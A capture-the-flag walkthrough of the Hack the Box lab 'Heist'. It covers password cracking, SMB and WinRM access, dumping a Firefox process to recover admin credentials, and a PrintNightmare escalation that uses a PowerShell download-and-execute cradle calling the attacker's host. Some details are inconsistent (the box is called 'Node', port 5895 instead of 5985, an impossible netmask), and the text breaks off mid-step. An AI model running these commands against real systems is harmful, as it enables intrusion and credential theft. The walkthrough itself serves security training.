Today we are going to solve another CTF challenge “Heist” which is available online for those who want to increase their skill in penetration testing and black box testing. Node is retired vulnerable lab presented by Hack the Box for making online penetration practices according to your experience level; they have the collection of vulnerable labs as challenges from beginners to Expert level.
Level: Easy
Task: find user.txt and root.txt file on victim’s machine
Let’s start with a nmap scan
c:\PENTEST>nmap -p- 10.10.10.149 Starting Nmap 7.70 ( https://nmap.org ) at 2019-12-03 21:04 W. Europe Standard Time Stats: 0:00:14 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan Nmap scan report for 10.10.10.149 Host is up (0.025s latency). Not shown: 65530 filtered ports PORT STATE SERVICE 80/tcp open http 135/tcp open msrpc 445/tcp open microsoft-ds 5985/tcp open wsman 49668/tcp open unknown Nmap done: 1 IP address (1 host up) scanned in 136.45 seconds
We got smb and http on port 80, and winrm on port 5895
Anonymous authentication wasn’t allowed on smb:
root@kali:/htb# smbclient --list //heist.htb/ -U '' Enter WORKGROUP\'s password: session setup failed: NT_STATUS_LOGON_FAILURE
So let’s check the web service.
Web Enumeration
The index page had a login form, however there was a guest login option:
After getting in as guest I got this issues page:
A user called hazard posted an issue that he’s having some problems with his Cisco router and he attached the configuration file with the issue.
The configuration file had some password hashes and usernames:
version 12.2
no service pad
service password-encryption
!
isdn switch-type basic-5ess
!
hostname ios-1
!
security passwords min-length 12
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
!
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
!
!
ip ssh authentication-retries 5
ip ssh version 2
!
!
router bgp 100
synchronization
bgp log-neighbor-changes
bgp dampening
network 192.168.0.0 mask 300.255.255.0
timers bgp 3 9
redistribute connected
!
ip classless
ip route 0.0.0.0 0.0.0.0 192.168.0.1
!
!
access-list 101 permit ip any any
dialer-list 1 protocol ip list 101
!
no ip http server
no ip http secure-server
!
line vty 0 4
session-timeout 600
authorization exec SSH
transport input ssh
For the type 7 passwords I used https://github.com/puckiestyle/python/blob/master/ciscot7.py to crack them:
c:\PENTEST>python ciscot7.py -d -p 0242114B0E143F015F5D1E161713 Decrypted password: $uperP@ssword
c:\PENTEST>python ciscot7.py -d -p 02375012182C1A1D751618034F36415408 Decrypted password: Q4)sJu\Y8qz*A3?d
And for the other hash I cracked it with john:
root@kali:~/Desktop/HTB/boxes/heist# cat hash.txt
$1$pdQG$o8nrSzsGXeaduXrjlvKc91
root@kali:~/Desktop/HTB/boxes/heist# john --wordlist=/usr/share/wordlists/rockyou.txt ./hash.txt
Created directory: /root/.john
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 AVX 4x3])
Press 'q' or Ctrl-C to abort, almost any other key for status
stealth1agent (?)
1g 0:00:01:09 DONE (2019-11-29 12:17) 0.01440g/s 50492p/s 50492c/s 50492C/s stealth323..stealth1967
Use the "--show" option to display all of the cracked passwords reliably
Session completed
root@kali:~/Desktop/HTB/boxes/heist# Enumerating Users –> Shell as Chase –> User Flag
So far we have hazard and rout3r as potential usernames and stealth1agent, $uperP@ssword, Q4)sJu\Y8qz*A3?d as potential passwords.
I tried different combinations and I could authenticate to smb as hazard : stealth1agent, however there weren’t any useful shares:
root@kali:/htb# smbclient --list //heist.htb/ -U 'hazard'
Enter WORKGROUP\hazard's password: stealth1agent Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share IPC$ IPC Remote IPC Reconnecting with SMB1 for workgroup listing. Connection to heist.htb failed (Error NT_STATUS_IO_TIMEOUT) Failed to connect with SMB1 -- no workgroup available
I used lookupsid.py from impacket to enumerate the other users:
root@kali:~/htb# lookupsid.py hazard:stealth1agent@10.10.10.149 Impacket v0.9.20-dev - Copyright 2019 SecureAuth Corporation [*] Brute forcing SIDs at 10.10.10.149 [*] StringBinding ncacn_np:10.10.10.149[\pipe\lsarpc] [*] Domain SID is: S-1-5-21-4254423774-1266059056-3197185112 500: SUPPORTDESK\Administrator (SidTypeUser) 501: SUPPORTDESK\Guest (SidTypeUser) 503: SUPPORTDESK\DefaultAccount (SidTypeUser) 504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser) 513: SUPPORTDESK\None (SidTypeGroup) 1008: SUPPORTDESK\Hazard (SidTypeUser) 1009: SUPPORTDESK\support (SidTypeUser) 1012: SUPPORTDESK\Chase (SidTypeUser) 1013: SUPPORTDESK\Jason (SidTypeUser)
Then I could authenticate to winrm as chase : Q4)sJu\Y8qz*A3?d:
i used evil-winrm from : https://github.com/Hackplayers/evil-winrm
root@kali:/opt/evil-winrm# ./evil-winrm.rb -i heist.htb -u chase -p 'Q4)sJu\Y8qz*A3?d' -s './ps1_scripts/' -e './exe_files/' Info: Starting Evil-WinRM shell v1.6 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\Chase\Documents> dir *Evil-WinRM* PS C:\Users\Chase\Documents> cd .. *Evil-WinRM* PS C:\Users\Chase> cd Desktop *Evil-WinRM* PS C:\Users\Chase\Desktop> dir Directory: C:\Users\Chase\Desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 4/22/2019 9:08 AM 121 todo.txt -a---- 4/22/2019 9:07 AM 32 user.txt *Evil-WinRM* PS C:\Users\Chase\Desktop> type user.txt a127*****9c4 *Evil-WinRM* PS C:\Users\Chase\Desktop>
Administrator Password from Firefox Process Dump –> Shell as Administrator –> Root Flag
After enumerating the box for a while I noticed that Firefox was installed on the box which is unusual:
*Evil-WinRM* PS C:\Users\Chase\appdata\Roaming> ls
Directory: C:\Users\Chase\appdata\Roaming
Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 4/22/2019 7:14 AM Adobe d---s- 4/22/2019 7:14 AM Microsoft d----- 4/22/2019 8:01 AM Mozilla *Evil-WinRM* PS C:\Users\Chase\appdata\Roaming> cd Mozilla
*Evil-WinRM* PS C:\Users\Chase\appdata\Roaming\Mozilla> ls
Directory: C:\Users\Chase\appdata\Roaming\Mozilla
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 4/22/2019 8:01 AM Extensions
d----- 4/22/2019 8:01 AM Firefox
d----- 4/22/2019 8:01 AM SystemExtensionsDev
*Evil-WinRM* PS C:\Users\Chase\appdata\Roaming\Mozilla>
And there were some Firefox processes running:
*Evil-WinRM* PS C:\users\chase> ps
Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName
------- ------ ----- ----- ------ -- -- -----------
452 18 2284 5424 404 0 csrss
292 17 2288 5240 492 1 csrss
358 15 3544 14652 5232 1 ctfmon
164 9 1832 9784 0.09 2008 1 dllhost
258 14 3988 13460 3952 0 dllhost
623 32 33768 59456 76 1 dwm
1501 58 23868 78792 5608 1 explorer
1135 73 153452 493888 38.55 2660 1 firefox
407 31 17508 63304 4.22 2996 1 firefox
390 36 79316 111904 96.61 3960 1 firefox
343 20 10652 38912 1.31 4052 1 firefox
358 26 16368 37572 1.06 6200 1 firefox
I uploaded procdump.exe [ It is not needed to put a remote_path if the local file is in the same directory as evil–winrm. rb file ] and dumped one of these processes:
*Evil-WinRM* PS C:\users\chase> .\procdump64.exe -accepteula -ma 2660 firefox.dmp [14:45:37] Dump 1 initiated: C:\users\chase\firefox.dmp [14:45:37] Dump 1 writing: Estimated dump file size is 494 MB. [14:45:41] Dump 1 complete , next I uploaded strings.exe and used it on the dump and saved the output to another file:
*Evil-WinRM* PS C:\users\chase> upload strings64.exe c:\users\chase Info: Uploading strings64.exe to c:\users\chase Data: 218676 bytes of 218676 bytes copied Info: Upload successful!
*Evil-WinRM* PS C:\users\chase> cmd /c "strings64.exe -accepteula firefox.dmp > firefox.txt" cmd.exe : + CategoryInfo : NotSpecified: (:String) [], RemoteException + FullyQualifiedErrorId : NativeCommandError Strings v2.53 - Search for ANSI and Unicode strings in binary images. Copyright (C) 1999-2016 Mark Russinovich Sysinternals - www.sysinternals.com
*Evil-WinRM* PS C:\windows\system32\spool\drivers\color> upload strings64.exe
Info: Uploading strings64.exe to C:\windows\system32\spool\drivers\color\strings64.exe
Data: 218676 bytes of 218676 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\windows\system32\spool\drivers\color> cmd /c "strings64.exe -accepteula firefox.exe_191129_211531.dmp > firefox.exe_191129_211531.txt"
cmd.exe :
+ CategoryInfo : NotSpecified: (:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
Strings v2.53 - Search for ANSI and Unicode strings in binary images.
Copyright (C) 1999-2016 Mark Russinovich
Sysinternals - www.sysinternals.com
*Evil-WinRM* PS C:\windows\system32\spool\drivers\color>
I searched for the word “admin@” and found Administrator’s credentials exposed in some GET requests:
*Evil-WinRM* PS C:\users\chase> findstr "admin@" ./firefox.txt
-snip-
facebook extension (malware)","created":"2012-02-13T15:41:02Z"},"enabled":true,"versionRange":[{"severity":3,"maxVersion":"*","minVersion":"0","targetApplication":[]}],"id":"79ad1c9b-0828-78
localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
http://localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
http://localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
http://localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
http://localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
http://localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
O^privateBrowsingId=1,p,:http://localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
admin@vietbacsecurity.com
admin@youtubeplayer.com
admin@youtubespeedup.com
:http://localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
:http://localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
http://localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
pkiadmin@trustcentre.co.za0
root@kali:/opt/evil-winrm# ./evil-winrm.rb -i heist.htb -u administrator -p '4dD!5}x/re8]FBuZ' -s './ps1_scripts/' -e './exe_files/' Info: Starting Evil-WinRM shell v1.6 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\Administrator\Documents> cd .. *Evil-WinRM* PS C:\Users\Administrator> cd Desktop *Evil-WinRM* PS C:\Users\Administrator\Desktop> dir Directory: C:\Users\Administrator\Desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 4/22/2019 9:05 AM 32 root.txt *Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt 50d*****897
.
Beyond Root – PrintNightmare
Heist is vulnerable to CVE-2021-34527, or PrintNightmare.
From chase to Admin, we switch to PowerShell:
puck@parrot-lt:/opt/evil-winrm# ./evil-winrm.rb -i heist.htb -u chase -p 'Q4)sJu\Y8qz*A3?d' Info: Starting Evil-WinRM shell v1.6 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\Chase\Documents>
I’ll start a webserver in the Invoke-Nightmare directory on my host:
puck@parrot-ls$ ls
CVE-2021-1675.ps1 nightmare-dll README.md
oxdf@parrot$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
If I try to upload a copy and load it, Windows blocks that:
PS C:\programdata> wget 10.10.14.10/CVE-2021-1675.ps1 -outfile ./in.ps1
PS C:\programdata> ls in.ps1
Directory: C:\programdata
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 7/9/2022 9:38 AM 178561 in.ps1
PS C:\programdata> Import-Module .\in.ps1
Import-Module : File C:\programdata\in.ps1 cannot be loaded because running scripts is disabled on this system. For
more information, see about_Execution_Policies at https:/go.microsoft.com/fwlink/?LinkID=135170.
At line:1 char:1
+ Import-Module .\in.ps1
+ ~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : SecurityError: (:) [Import-Module], PSSecurityException
+ FullyQualifiedErrorId : UnauthorizedAccess,Microsoft.PowerShell.Commands.ImportModuleCommand
However, I can just Invoke-Expression (or iex) the code. I can do so right from the webserver:
PS C:\programdata> iex(new-object net.webclient).downloadstring('http://10.10.14.10/CVE-2021-1675.ps1')
Or from the local copy:
PS C:\programdata> iex(cat in.ps1 -raw)
Either way, the code is now loaded. Now I can run it to add a user:
PS C:\programdata> Invoke-Nightmare -NewUser "puck" -NewPassword "puckpuck"
Invoke-Nightmare -NewUser "puck" -NewPassword "puckpuck"
[+] created payload at C:\Users\chase\AppData\Local\Temp\nightmare.dll
[+] using pDriverPath = "C:\WINDOWS\System32\DriverStore\FileRepository\ntprint.inf_amd64_c62e9f8067f98247\Amd64\mxdwdrv.dll"
[+] added user puck as local administrator
[+] deleting payload from C:\Users\chase\AppData\Local\Temp\nightmare.dll
With admin priv, I can WMIexec to get remote execution as SYSTEM:
Author : Puckiestyle